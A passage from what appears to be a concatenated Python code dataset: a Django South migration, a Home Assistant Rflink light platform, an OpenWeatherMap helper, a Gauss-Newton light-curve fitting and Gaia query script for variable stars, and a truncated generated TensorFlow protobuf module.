if bulk_grade_mode:
do_bulk_grading(assignment, baseline)
else:
check_assignment(assignment, baseline)
finally:
reset_state()
|
py | b410fd2dcca84d06c5cb7d8e0d6481381188bd00 | # -*- coding: utf-8 -*-
from south.db import db
from django.db import models
from django_lean.experiments.models import *
class Migration:
def forwards(self, orm):
# Adding field 'DailyReport.test_group_size'
db.add_column('experiments_dailyreport', 'test_group_size', orm['experiments.dailyreport:test_group_size'])
# Adding field 'DailyReport.control_group_size'
db.add_column('experiments_dailyreport', 'control_group_size', orm['experiments.dailyreport:control_group_size'])
# Changing field 'Participant.anonymous_visitor'
# (to signature: django.db.models.fields.related.ForeignKey(to=orm['experiments.AnonymousVisitor'], null=True, blank=True))
db.alter_column('experiments_participant', 'anonymous_visitor_id', orm['experiments.participant:anonymous_visitor'])
def backwards(self, orm):
# Deleting field 'DailyReport.test_group_size'
db.delete_column('experiments_dailyreport', 'test_group_size')
# Deleting field 'DailyReport.control_group_size'
db.delete_column('experiments_dailyreport', 'control_group_size')
# Changing field 'Participant.anonymous_visitor'
# (to signature: django.db.models.fields.related.ForeignKey(to=orm['experiments.AnonymousVisitor'], null=True))
db.alter_column('experiments_participant', 'anonymous_visitor_id', orm['experiments.participant:anonymous_visitor'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'experiments.anonymousvisitor': {
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'experiments.dailyreport': {
'control_group_size': ('django.db.models.fields.IntegerField', [], {}),
'control_score': ('django.db.models.fields.FloatField', [], {}),
'date': ('django.db.models.fields.DateField', [], {}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.Experiment']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'test_group_size': ('django.db.models.fields.IntegerField', [], {}),
'test_score': ('django.db.models.fields.FloatField', [], {})
},
'experiments.experiment': {
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'unique': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'experiments.goalrecord': {
'anonymous_visitor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.AnonymousVisitor']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'goal_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.GoalType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'experiments.goaltype': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'unique': 'True'})
},
'experiments.participant': {
'Meta': {'unique_together': "(('user', 'experiment'), ('anonymous_visitor', 'experiment'))"},
'anonymous_visitor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.AnonymousVisitor']", 'null': 'True', 'blank': 'True'}),
'enrollment_date': ('django.db.models.fields.DateField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'experiment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['experiments.Experiment']"}),
'group': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['experiments']
|
py | b410fdceff7bcd2d58648e4a7ae98037f53adbf0 | """
Support for Rflink lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.rflink/
"""
import asyncio
import logging
from homeassistant.components.light import (
ATTR_BRIGHTNESS, SUPPORT_BRIGHTNESS, Light)
from homeassistant.components.rflink import (
CONF_ALIASES, CONF_ALIASSES, CONF_AUTOMATIC_ADD, CONF_DEVICE_DEFAULTS,
CONF_DEVICES, CONF_FIRE_EVENT, CONF_GROUP, CONF_GROUP_ALIASES,
CONF_GROUP_ALIASSES, CONF_IGNORE_DEVICES, CONF_NOGROUP_ALIASES,
CONF_NOGROUP_ALIASSES, CONF_SIGNAL_REPETITIONS, DATA_DEVICE_REGISTER,
DATA_ENTITY_GROUP_LOOKUP, DATA_ENTITY_LOOKUP, DEVICE_DEFAULTS_SCHEMA,
DOMAIN, EVENT_KEY_COMMAND, EVENT_KEY_ID, SwitchableRflinkDevice, cv,
remove_deprecated, vol)
from homeassistant.const import (
CONF_NAME, CONF_PLATFORM, CONF_TYPE, STATE_UNKNOWN)
from homeassistant.helpers.deprecation import get_deprecated
DEPENDENCIES = ['rflink']
_LOGGER = logging.getLogger(__name__)
TYPE_DIMMABLE = 'dimmable'
TYPE_SWITCHABLE = 'switchable'
TYPE_HYBRID = 'hybrid'
TYPE_TOGGLE = 'toggle'
PLATFORM_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): DOMAIN,
vol.Optional(CONF_IGNORE_DEVICES): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_DEVICE_DEFAULTS, default=DEVICE_DEFAULTS_SCHEMA({})):
DEVICE_DEFAULTS_SCHEMA,
vol.Optional(CONF_AUTOMATIC_ADD, default=True): cv.boolean,
vol.Optional(CONF_DEVICES, default={}): vol.Schema({
cv.string: {
vol.Optional(CONF_NAME): cv.string,
vol.Optional(CONF_TYPE):
vol.Any(TYPE_DIMMABLE, TYPE_SWITCHABLE,
TYPE_HYBRID, TYPE_TOGGLE),
vol.Optional(CONF_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_GROUP_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_NOGROUP_ALIASES, default=[]):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_FIRE_EVENT): cv.boolean,
vol.Optional(CONF_SIGNAL_REPETITIONS): vol.Coerce(int),
vol.Optional(CONF_GROUP, default=True): cv.boolean,
# deprecated config options
vol.Optional(CONF_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_GROUP_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_NOGROUP_ALIASSES):
vol.All(cv.ensure_list, [cv.string]),
},
}),
})
def entity_type_for_device_id(device_id):
"""Return entity class for protocol of a given device_id.
Async friendly.
"""
entity_type_mapping = {
# KlikAanKlikUit support both dimmers and on/off switches on the same
# protocol
'newkaku': TYPE_HYBRID,
}
protocol = device_id.split('_')[0]
return entity_type_mapping.get(protocol, None)
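# Example (hypothetical device ids), based on the mapping above:
#   entity_type_for_device_id('newkaku_00abcd_01') -> TYPE_HYBRID
#   entity_type_for_device_id('somevendor_123_01') -> None, in which case
#   entity_class_for_type() below falls back to RflinkLight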
def entity_class_for_type(entity_type):
"""Translate entity type to entity class.
Async friendly.
"""
entity_device_mapping = {
# sends only 'dim' commands not compatible with on/off switches
TYPE_DIMMABLE: DimmableRflinkLight,
# sends only 'on/off' commands; not advised for dimmers and signal
# repetition
TYPE_SWITCHABLE: RflinkLight,
# sends 'dim' and 'on' command to support both dimmers and on/off
# switches. Not compatible with signal repetition.
TYPE_HYBRID: HybridRflinkLight,
# sends only 'on' commands for switches which turn on and off
# using the same 'on' command for both.
TYPE_TOGGLE: ToggleRflinkLight,
}
return entity_device_mapping.get(entity_type, RflinkLight)
def devices_from_config(domain_config, hass=None):
"""Parse configuration and add Rflink light devices."""
devices = []
for device_id, config in domain_config[CONF_DEVICES].items():
# Determine which kind of entity to create
if CONF_TYPE in config:
# Remove type from config to not pass it as and argument to entity
# instantiation
entity_type = config.pop(CONF_TYPE)
else:
entity_type = entity_type_for_device_id(device_id)
entity_class = entity_class_for_type(entity_type)
device_config = dict(domain_config[CONF_DEVICE_DEFAULTS], **config)
remove_deprecated(device_config)
is_hybrid = entity_class is HybridRflinkLight
# Make user aware this can cause problems
repetitions_enabled = device_config[CONF_SIGNAL_REPETITIONS] != 1
if is_hybrid and repetitions_enabled:
_LOGGER.warning(
"Hybrid type for %s not compatible with signal "
"repetitions. Please set 'dimmable' or 'switchable' "
"type explicitly in configuration", device_id)
device = entity_class(device_id, hass, **device_config)
devices.append(device)
# Register entity (and aliases) to listen to incoming rflink events
# Device id and normal aliases respond to normal and group command
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
if config[CONF_GROUP]:
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
for _id in get_deprecated(config, CONF_ALIASES, CONF_ALIASSES):
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
# group_aliases only respond to group commands
for _id in get_deprecated(
config, CONF_GROUP_ALIASES, CONF_GROUP_ALIASSES):
hass.data[DATA_ENTITY_GROUP_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
# nogroup_aliases only respond to normal commands
for _id in get_deprecated(
config, CONF_NOGROUP_ALIASES, CONF_NOGROUP_ALIASSES):
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][_id].append(device)
return devices
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the Rflink light platform."""
async_add_entities(devices_from_config(config, hass))
@asyncio.coroutine
def add_new_device(event):
"""Check if device is known, otherwise add to list of known devices."""
device_id = event[EVENT_KEY_ID]
entity_type = entity_type_for_device_id(event[EVENT_KEY_ID])
entity_class = entity_class_for_type(entity_type)
device_config = config[CONF_DEVICE_DEFAULTS]
device = entity_class(device_id, hass, **device_config)
async_add_entities([device])
# Register entity to listen to incoming Rflink events
hass.data[DATA_ENTITY_LOOKUP][
EVENT_KEY_COMMAND][device_id].append(device)
# Schedule task to process event after entity is created
hass.async_add_job(device.handle_event, event)
if config[CONF_AUTOMATIC_ADD]:
hass.data[DATA_DEVICE_REGISTER][EVENT_KEY_COMMAND] = add_new_device
class RflinkLight(SwitchableRflinkDevice, Light):
"""Representation of a Rflink light."""
pass
class DimmableRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device that support dimming."""
_brightness = 255
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on."""
if ATTR_BRIGHTNESS in kwargs:
# rflink only support 16 brightness levels
self._brightness = int(kwargs[ATTR_BRIGHTNESS] / 17) * 17
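# e.g. a requested brightness of 128 becomes int(128 / 17) * 17 = 119,
# snapping it to one of the 16 levels rflink can represent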
# Turn on light at the requested dim level
yield from self._async_handle_command('dim', self._brightness)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS
class HybridRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device that sends out both dim and on/off commands.
Used for protocols which support lights that are not exclusively on/off
style. For example KlikAanKlikUit supports both on/off and dimmable light
switches using the same protocol. This type allows unconfigured
KlikAanKlikUit devices to support dimming without breaking support for
on/off switches.
This type is not compatible with signal repetitions as the 'dim' and 'on'
commands are sent sequentially, and multiple 'on' commands to a dimmable
device can cause the dimmer to switch into a pulsating brightness mode.
Which results in a nice house disco :)
"""
_brightness = 255
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on and set dim level."""
if ATTR_BRIGHTNESS in kwargs:
# rflink only support 16 brightness levels
self._brightness = int(kwargs[ATTR_BRIGHTNESS] / 17) * 17
# if receiver supports dimming this will turn on the light
# at the requested dim level
yield from self._async_handle_command('dim', self._brightness)
# if the receiving device does not support dimlevel this
# will ensure it is turned on when full brightness is set
if self._brightness == 255:
yield from self._async_handle_command('turn_on')
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
return self._brightness
@property
def supported_features(self):
"""Flag supported features."""
return SUPPORT_BRIGHTNESS
class ToggleRflinkLight(SwitchableRflinkDevice, Light):
"""Rflink light device which sends out only 'on' commands.
Some switches like for example Livolo light switches use the
same 'on' command to switch on and switch off the lights.
If the light is on and 'on' gets sent, the light will turn off
and if the light is off and 'on' gets sent, the light will turn on.
"""
@property
def entity_id(self):
"""Return entity id."""
return "light.{}".format(self.name)
def _handle_event(self, event):
"""Adjust state if Rflink picks up a remote command for this device."""
self.cancel_queued_send_commands()
command = event['command']
if command == 'on':
# if the state is unknown or false, it gets set as true
# if the state is true, it gets set as false
self._state = self._state in [STATE_UNKNOWN, False]
@asyncio.coroutine
def async_turn_on(self, **kwargs):
"""Turn the device on."""
yield from self._async_handle_command('toggle')
@asyncio.coroutine
def async_turn_off(self, **kwargs):
"""Turn the device off."""
yield from self._async_handle_command('toggle')
|
py | b410fec1b7dae7554b1fae456c24b309e607f02b | import requests
def get_weather_data(lat, lon, weather_api_key):
params = {"appid": weather_api_key, "lat": str(lat), "lon": str(lon)}
weatherRequest = requests.get(
"https://api.openweathermap.org/data/2.5/weather?", params=params)
weatherResponse = weatherRequest.json() # Converts into type 'dict'
wind_heading = weatherResponse['wind']['deg']
temperature = (weatherResponse.get('main')).get('temp')
humidity = (weatherResponse.get('main')).get('humidity')
visibility = weatherResponse.get('visibility')
wind_speed = (weatherResponse.get('wind')).get('speed')
weather_dict = {
"temperature": temperature,
"humidity": humidity,
"visibility": visibility,
"wind_speed": wind_speed,
"wind_heading": wind_heading
}
return weather_dict
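# Example usage (hypothetical coordinates and API key):
#   weather = get_weather_data(48.86, 2.35, "YOUR_OPENWEATHERMAP_KEY")
#   print(weather["wind_speed"], weather["temperature"])
# Note: without a 'units' parameter this endpoint reports temperature in Kelvin.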
|
py | b411017f68be4ebca613a297f9533048c62bb2cc | """
TODO:
- identify and rectify the Gauss-Newton matrix dot-product and inversion issues
"""
#dependencies
import os
import csv
import math
import statistics
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy import coordinates as coords
from astroquery.gaia import Gaia
from csv import writer
from numpy.linalg import inv
from numpy.linalg import det
#data locations; replace with coordinates of LC DAT directory and metadata txt file, respectively
LCdir = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\I"
outputdir = r"C:\Users\micha\Documents\BLG_data_processing\PROCESSED"
stardata = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\BLG_metadata.txt"
lastsortedloc = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\processed.txt"
colordeviationstats = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\stats.csv"
debugloc = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\debug.txt"
matrixbuglog = r"C:\Users\micha\Documents\BLG_data_processing\OGLE-ATLAS-RR-c\matrixbug.txt"
#get file directory
LCfilelist = os.listdir(LCdir)
LCfilelength = len(LCfilelist)
#reading all star data from DAT file (names and periods for wave fitting, RA and dec for Gaia query)
names = np.loadtxt(stardata, dtype=str, skiprows=7, usecols=0)
periods = np.loadtxt(stardata, skiprows=7, usecols=8)
fallbackRA = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 2)
allRA = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 3)
alldec = np.loadtxt(stardata, dtype = "str", skiprows = 7, usecols = 4)
#lastsaved
lastsorted = open(lastsortedloc, "r")
laststar = int(lastsorted.read())
lastsorted.close()
#implementing Gauss-Newton Algorithm for curve fitting non linear regression; in this case, of the form Asin(Bx+C)+D
def gaussnewton(name, phases, brightnesses, average, amplitude, mid_phase):
#in case of Gauss-Newton fitting error, we may fallback onto initial guess values for fit
fallback_sin = (amplitude * np.sin(((phases - mid_phase) * 2 * math.pi))) + average
fallback_rms = math.sqrt((1 / (fallback_sin.size)) * np.sum(abs(np.subtract(fallback_sin, brightnesses)) ** 2))
#in case of phase flipped midpoint mis-fit
phaseflip_fallback_sin = (-1 * fallback_sin) + (2 * average)
phaseflip_rms = math.sqrt((1 / (phaseflip_fallback_sin.size)) * np.sum(abs(np.subtract(phaseflip_fallback_sin, brightnesses)) ** 2))
if fallback_rms > phaseflip_rms:
fallback_sin = phaseflip_fallback_sin
fallback_rms = phaseflip_rms
#Gauss-Newton iterations and damping parameters
iter = 400
damping = 0.02
#PDEs in Gauss-Newton
def pdA(x, b, c):
return np.sin(b * x + c)
def pdB(x, a, b, c):
return a * x * np.cos(b * x + c)
def pdC(x, a, b, c):
return a * np.cos(b * x + c)
def pdD(x):
return 1
#least squares
def leastSquares(x, y, a, b, c, d):
return y - (a * np.sin(b * x + c) + d)
#standard method io
x = phases
y = brightnesses
#initial guesses for A, B, C, D in sine
B = np.matrix([[amplitude], [2 * math.pi], [(mid_phase) * 2 * math.pi], [average]])
#jacobian matrix for diff eq
J = np.zeros((x.size, 4))
#least square vector
r = np.zeros((x.size, 1))
for _ in range(0, iter):
for i in range(0, x.size):
#compute each value of r in this iteration
r[i, 0] = leastSquares(x[i], y[i], B[0], B[1], B[2], B[3])
#calculate the Values of Jacobian matrix on this iteration
J[i, 0] = pdA(x[i], B[1], B[2])
J[i, 1] = pdB(x[i], B[0], B[1], B[2])
J[i, 2] = pdC(x[i], B[0], B[1], B[2])
J[i, 3] = pdD(x[i])
Jt = J.T
if (det(np.dot(Jt, J)) == 0.0):
print("determinant is zero, inversion would kill the loop.")
matrixbugfile = open(matrixbuglog, "a")
matrixbugfile.write("\n")
matrixbugfile.write(name)
break
#print("transpose " + str(Jt))
#print("dot1 " + str(np.dot(Jt, J)))
#print("inv " + str(inv(np.dot(Jt, J))))
#print("dot2 " + str(np.dot(inv(np.dot(Jt, J)), Jt)))
#print("dot3 " + str((np.dot(np.dot(inv(np.dot(Jt, J)), Jt), r))))
B += damping * (np.dot(np.dot(inv(np.dot(Jt, J)), Jt), r))
#print("B " + str(B))
#generate Gauss-Newton fitted sine curve, and calculate RMS
gaussnewton_sin = np.array([B[0] * np.sin((B[1] * x) + B[2]) + B[3]])
rms = math.sqrt((1 / (gaussnewton_sin.size)) * np.sum(abs(np.subtract(gaussnewton_sin, brightnesses)) ** 2))
#fallback in case of fitting failure, use initial values
if rms > fallback_rms:
print("gaussnewton failed, fallback to standard")
gaussnewton_sin = fallback_sin
rms = fallback_rms
#read Gauss-Newton failrate
debugfiler = open(debugloc, "r")
GNfail = int(debugfiler.read())
debugfiler.close()
#write Gauss-Newton fail to debug
debugfilew = open(debugloc, "w")
debugfilew.write(str(GNfail + 1))
debugfilew.close()
#shorten RMS for better visibility
roundedrms = float(rms)
roundedrms = round(roundedrms, 4 - int(math.floor(math.log10(abs(roundedrms)))) - 1)
#return fitted curve and RMS
return (gaussnewton_sin, str(rms), str(roundedrms))
#implementing method of querying Gaia data for the bp-rp color of the star
def gaiaquery(starnumber, fallbackRA, allRA, alldec):
#reading coords of the star
RA = allRA[starnumber]
#formatting issue in metadata, where they lose a column and dec is read as RA
if (float(RA.split(":")[0]) < 0.0):
print("metadata formatting issue, using fallback RA")
dec = RA
RA = fallbackRA[starnumber]
else:
dec = alldec[starnumber]
#setting up coords query, height and width search precision
coord = coords.SkyCoord(ra = RA, dec = dec, unit = (u.hourangle, u.deg), frame = "icrs")
height = u.Quantity(1, u.arcsec)
width = u.Quantity(1, u.arcsec)
#query
star = Gaia.query_object(coordinate=coord, width=width, height=height, columns=["source_id, ra, dec, bp_rp"])
#star is a table
#print("star:")
#print(star)
if (star["bp_rp"].size == 0):
color = "No color photometric data"
roundedcolor = color
else:
color = str(star["bp_rp"][0])
if color == "--":
color = "No color photometric data"
roundedcolor = color
else:
#shorten color for better visibility
roundedcolor = float(color)
roundedcolor = round(roundedcolor, 5 - int(math.floor(math.log10(abs(roundedcolor))) - 1))
#return coordinates, color
return (RA, dec, color, roundedcolor)
def plot(phases, brightnesses, gaussnewton_sin, RA, dec, rms, color, name, outputdir):
fig = plt.figure(figsize = (10,5))
fig.suptitle(str(name), fontsize = 22, fontweight = 'bold')
ax = fig.add_subplot(111)
fig.subplots_adjust(left = 0.1, right = 0.98, top = 0.87, bottom = 0.1)
ax.set_xlabel("Phase")
ax.set_ylabel("Magnitude")
#plotting original LC, and fitted sine curve
ax.scatter(phases, brightnesses)
ax.scatter(phases, gaussnewton_sin)
#adding legend to graph for readability
ax.legend(["Original LC", "Fitted Sine Curve"])
#plotting the RMS deviation onto the graph
ax.text(0.94, 1.03, ("RMS = " + str(rms)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'purple', fontsize = 10)
#plotting coords, color onto the graph
ax.text(0.01, 1.09, ("RA = " + str(RA)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'green', fontsize = 8)
ax.text(0.01, 1.06, ("dec = " + str(dec)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'green', fontsize = 8)
if color == "No color photometric data":
ax.text(0.01, 1.03, (str(color)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'orange', fontsize = 7)
else:
ax.text(0.01, 1.03, ("Color = " + str(color)), verticalalignment = 'bottom', horizontalalignment = 'center', transform = ax.transAxes, color = 'orange', fontsize = 8)
#show plot if testing in IDE
#plt.show()
#save plot
plt.savefig((outputdir + "\\" + (name) + ".png"), format = "png")
plt.close("all")
#driver to iterate through all the stars, starting from where we last left off
for countLC in range(laststar, LCfilelength, 1):
#specifying the LC data file, without iterating through listdir in outer for loop
file = LCfilelist[countLC]
# reading LC data from LC files (dates and brightness)
#trim initial whitespaces in cases where time starts with 3 digit JD, so there is whitespace before time
dates = []
brightnesses = []
with open(LCdir + "\\" + file, "rt") as f:
read = csv.reader(f, skipinitialspace = True)
for row in read:
date = float(row[0].split()[0])
brightness = float(row[0].split()[1])
dates.append(date)
brightnesses.append(brightness)
dates = np.array(dates)
brightnesses = np.array(brightnesses)
#grabbing relevant star data for current star (name, starting time, period) from DAT file
name = names[countLC]
starting_date = dates[0]
period = periods[countLC]
#simple progress indicator, tells us which star program is up to
print("now processing " + name)
#simple phasing calculation to convert dates to 0 to 1 of a complete phase
phases = ((dates - starting_date) / period) % 1
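    #worked example (illustrative numbers only): with a 0.5 d period, an
    #observation 1.25 d after starting_date folds to (1.25 / 0.5) % 1 = 0.5,
    #i.e. halfway through the cycle; whole multiples of the period fold to 0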
#determining approximate values to fit the sine curve (Amplitude, Average Height Shift, Phase Shift), for initial guess values of Gauss-Newton algorithm.
    #average level estimated as the midpoint between the maximum and minimum brightness
average = (max(brightnesses) + min(brightnesses)) / 2
#better amplitude is the mean of the differences between average and max/min
amplitude = statistics.mean([(max(brightnesses) - average), average - min(brightnesses)])
#check for the closest value to the mean value of brightness (mid_brightness), find its corresponding x value (mid_index, mid_phase)
brightness_diff = lambda checkbrightness: abs(checkbrightness - average)
mid_brightness = min(brightnesses, key=brightness_diff)
mid_index = np.where(brightnesses == mid_brightness)[0][0]
mid_phase = phases[mid_index]
#Gauss-Newton fit, return the y values of the fitted gauss-newton curve
gaussnewton_sin, rms, roundedrms = gaussnewton(name, phases, brightnesses, average, amplitude, mid_phase)
#query Gaia for color
RA, dec, color, roundedcolor = gaiaquery(countLC, fallbackRA, allRA, alldec)
#temp star stats data to write to CSV later
tempstatsarray = [rms, color]
#plotting
#basic setup
plot(phases, brightnesses, gaussnewton_sin, RA, dec, roundedrms, roundedcolor, name, outputdir)
#autosaver and resume
lastsorted = open(lastsortedloc, "w")
lastsorted.write(str(countLC + 1))
lastsorted.close()
#star stats for final processing
with open(colordeviationstats, "a+", newline = "") as statsfile:
csv_writer = writer(statsfile)
csv_writer.writerow(tempstatsarray)
|
py | b41104799a926fc13867e47b7cecb3117b6534de | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: stfsclient/tensorflow/debug.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='stfsclient/tensorflow/debug.proto',
package='tensorflow',
syntax='proto3',
serialized_options=_b('\n\030org.tensorflow.frameworkB\013DebugProtosP\001Z<github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf\370\001\001'),
serialized_pb=_b('\n!stfsclient/tensorflow/debug.proto\x12\ntensorflow\"\x8e\x01\n\x10\x44\x65\x62ugTensorWatch\x12\x11\n\tnode_name\x18\x01 \x01(\t\x12\x13\n\x0boutput_slot\x18\x02 \x01(\x05\x12\x11\n\tdebug_ops\x18\x03 \x03(\t\x12\x12\n\ndebug_urls\x18\x04 \x03(\t\x12+\n#tolerate_debug_op_creation_failures\x18\x05 \x01(\x08\"\x81\x01\n\x0c\x44\x65\x62ugOptions\x12=\n\x17\x64\x65\x62ug_tensor_watch_opts\x18\x04 \x03(\x0b\x32\x1c.tensorflow.DebugTensorWatch\x12\x13\n\x0bglobal_step\x18\n \x01(\x03\x12\x1d\n\x15reset_disk_byte_usage\x18\x0b \x01(\x08\"j\n\x12\x44\x65\x62uggedSourceFile\x12\x0c\n\x04host\x18\x01 \x01(\t\x12\x11\n\tfile_path\x18\x02 \x01(\t\x12\x15\n\rlast_modified\x18\x03 \x01(\x03\x12\r\n\x05\x62ytes\x18\x04 \x01(\x03\x12\r\n\x05lines\x18\x05 \x03(\t\"K\n\x13\x44\x65\x62uggedSourceFiles\x12\x34\n\x0csource_files\x18\x01 \x03(\x0b\x32\x1e.tensorflow.DebuggedSourceFileBj\n\x18org.tensorflow.frameworkB\x0b\x44\x65\x62ugProtosP\x01Z<github.com/tensorflow/tensorflow/tensorflow/go/core/protobuf\xf8\x01\x01\x62\x06proto3')
)
_DEBUGTENSORWATCH = _descriptor.Descriptor(
name='DebugTensorWatch',
full_name='tensorflow.DebugTensorWatch',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='node_name', full_name='tensorflow.DebugTensorWatch.node_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='output_slot', full_name='tensorflow.DebugTensorWatch.output_slot', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='debug_ops', full_name='tensorflow.DebugTensorWatch.debug_ops', index=2,
number=3, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='debug_urls', full_name='tensorflow.DebugTensorWatch.debug_urls', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tolerate_debug_op_creation_failures', full_name='tensorflow.DebugTensorWatch.tolerate_debug_op_creation_failures', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
